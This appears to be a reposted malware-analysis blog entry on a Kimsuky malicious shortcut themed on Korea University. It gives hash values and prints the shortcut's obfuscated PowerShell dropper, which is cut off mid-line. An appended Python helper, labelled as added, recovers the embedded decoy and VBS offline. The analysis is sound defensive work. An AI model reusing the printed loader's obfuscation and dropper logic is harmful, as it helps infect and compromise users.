lazarusholic


Kimsuky malware that appears to be related to Korea University (2024.9.1)

2024-09-05, Sakai
http://wezard4u.tistory.com/429269
#Kimsuky #LNK

Contents

Today I will write about malware made by Kimsuky that appears to be related to Korea University. I gave the post this title, but it does include my personal opinion.
If you read the post carefully, you will see why.
Malware hash values
File name: 1.lnk
Size: 5.92 KB
MD5: 9110aeca8e78ede7b913ac54b4332b00
SHA-1: 50f580199250c5b9ca7e9a3b4ccea5d8603eab28
SHA-256: bd017c642fcd0b46fb1201f22d395edbf16221ebbcb660f7329fb76067164d07
Before running the sample, the PowerShell code contained in the malware is as follows:
StringData
{
namestring: Type: Text Document
Size: 5.23 KB
Date modified: 02/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
/C f(H)jk4fTLlkc5DZfyorHstui(9)FxCd6(x)w3Jkdddddddddddddddfklsjjjjdjjjjjjj
jjsdfjjjjjjjjjjjsdfjj(j)jjsdfjjjjjjjjjjjsssssss(d)jdddddddddikkkkdddddd(d)dd
dddddddddddddddddddddddd(d)dddddddddddddddddddddddddddddddddddddd(d)kdddddddd
ddddddddd(d)dddddddddddddddddddddddddddd(d)ddddddddddddddddddddddddddddddddddd
ddd(d)dddddddddddddddd(d)ddddddddddddddddddddddddddddddddddddddddddddkkkkkkkkk
kkffffffffffffff(f)ffffffffffffffffffffffffffkkkdkkkkkkkkkkkkkk(k)kkkkkkkkdddd
ddddddddddd(d)(d)ddddddddddddddd(d)dllllllllllllllleZWhdwrpiX+F4gEcRJCp5kddddd
ddddddddlkjsldkfjlkjlkjl(k)jlkjjjjjjj(j)jjjjjjjsdfffffff(f)ffffffslkjlkksdflkj
lknnlksn(l)dkfjli1KXfjUxLJXU8QzW5||goto&P^(o)^w^e^R^S^(h)^e^L^L -windo(w)style
hidden -c function getShapePath(){$lnkpath = G^e^t-C^hi^ld^Item *.lnk;$lnkpath
= $lnkpath^| w^he^re-o(b)^ject {$_.length -eq 0x000017B1} ;$lnkpath = $lnk(p)a
th^| S^el^ect-O^bject -Expand(P)roperty Name;return $lnkpath;} function getImg
Content(){$lnk(p)ath = getSha(p)ePath;$file = ^g^c $lnk(p)ath -E^nco^din^g Byt
e;r(e)turn $file};funct(i)on makepath(){$lnkpath = getShapePath;$lnkpath = '%t
emp%\'+$lnkpath.substring(0,$l(n)kpath.length-4);return $lnkpath};func(t)ion m
akepath1(){$path1 = '%temp%\tmp' (+) (Get(-)Random) + '(.)vbs';return $path1;}
;function ch(a)ngecontent(){$file = getImg(C)ontent; for($i=0; $i -lt $file(.)
count; $i++) { $file[$i] = $file[$i] -b(x)or 5 };return $file;};function su(b)
save{$path = makepath;$bytes = chan(g)econtent;$temp = $bytes ^| select -Skip
005602 ;$temp = ($temp ^|select -Ski(p)Last 000453);sc $path ([by(t)e[]]$temp)
-Encoding Byte(;)return @($path,$bytes);};function sa(v)econtent(){$_a_res = s
ubsave;$path1 = makepath1; ^s^c $path1 ([byte[]]($_a_(r)es[1] ^| select -Skip
005612)) -Encoding Byte;return @($_a_res[0],$path1);};$_a_path = savecontent;$
path1 = $_a_path[0];$path = …
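The loader above finds its own .lnk by exact size (0x17B1 bytes), XORs every byte with 5, and carves a decoy and a .vbs out of the result using fixed Skip/SkipLast offsets. The following triage helper is an added example written for this page, not code from the blog post or from the malware: it reproduces only that carving arithmetic so an analyst can recover both embedded files offline without running the loader. The LNK blob it builds is constructed; only the constants come from the command line quoted above.

```python
# Offline triage helper for the LNK loader quoted above (added example, not
# the blog's or the malware's code).  Reproduces the loader's carving step
# only: XOR 5, then the Skip/SkipLast offsets taken from the command line.
# The sample LNK built below is CONSTRUCTED; only the constants are from the page.

LNK_SIZE = 0x17B1       # $_.length -eq 0x000017B1 : loader finds its own .lnk by size
XOR_KEY = 5             # $file[$i] -bxor 5
DECOY_SKIP = 5602       # select -Skip 005602
DECOY_SKIP_LAST = 453   # select -SkipLast 000453
VBS_SKIP = 5612         # select -Skip 005612


def matches_loader_size(data: bytes) -> bool:
    """True only for a .lnk of exactly 0x17B1 bytes, the loader's self-check."""
    return len(data) == LNK_SIZE


def carve_payloads(data: bytes) -> tuple[bytes, bytes]:
    """XOR the whole file with 5 and slice out (decoy, vbs) as the loader does.

    With a 6065-byte file the Skip/SkipLast values leave decoded[5602:5612]
    for the decoy and decoded[5612:] (453 bytes) for the .vbs.
    """
    decoded = bytes(b ^ XOR_KEY for b in data)
    decoy = decoded[DECOY_SKIP:len(decoded) - DECOY_SKIP_LAST]
    vbs = decoded[VBS_SKIP:]
    return decoy, vbs


# CONSTRUCTED plaintext payloads sized to fit the loader's offsets exactly.
CONSTRUCTED_DECOY = b"decoy.txt\n"                                  # 10 bytes
CONSTRUCTED_VBS = b"' constructed placeholder, not the real script\r\n".ljust(
    LNK_SIZE - VBS_SKIP, b" ")                                      # 453 bytes


def build_constructed_sample() -> bytes:
    """Assemble a CONSTRUCTED LNK-shaped blob with the loader's layout.

    A real LNK header stays un-encoded so Windows still parses the shortcut;
    only the appended payload region is stored XOR-5 encoded.  The loader XORs
    the header too, but -Skip discards that garbage, so it never matters.
    """
    header = b"\x4c\x00\x00\x00" + b"\x00" * (DECOY_SKIP - 4)  # HeaderSize + filler
    payload = CONSTRUCTED_DECOY + CONSTRUCTED_VBS
    return header + bytes(b ^ XOR_KEY for b in payload)


if __name__ == "__main__":
    sample = build_constructed_sample()
    if matches_loader_size(sample):
        decoy, vbs = carve_payloads(sample)
        print(f"decoy {len(decoy)} bytes, vbs {len(vbs)} bytes: {vbs[:32]!r}")
```

Against a real sample, read the .lnk bytes from disk and pass them to carve_payloads; if matches_loader_size is false the file is not the variant these offsets describe.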
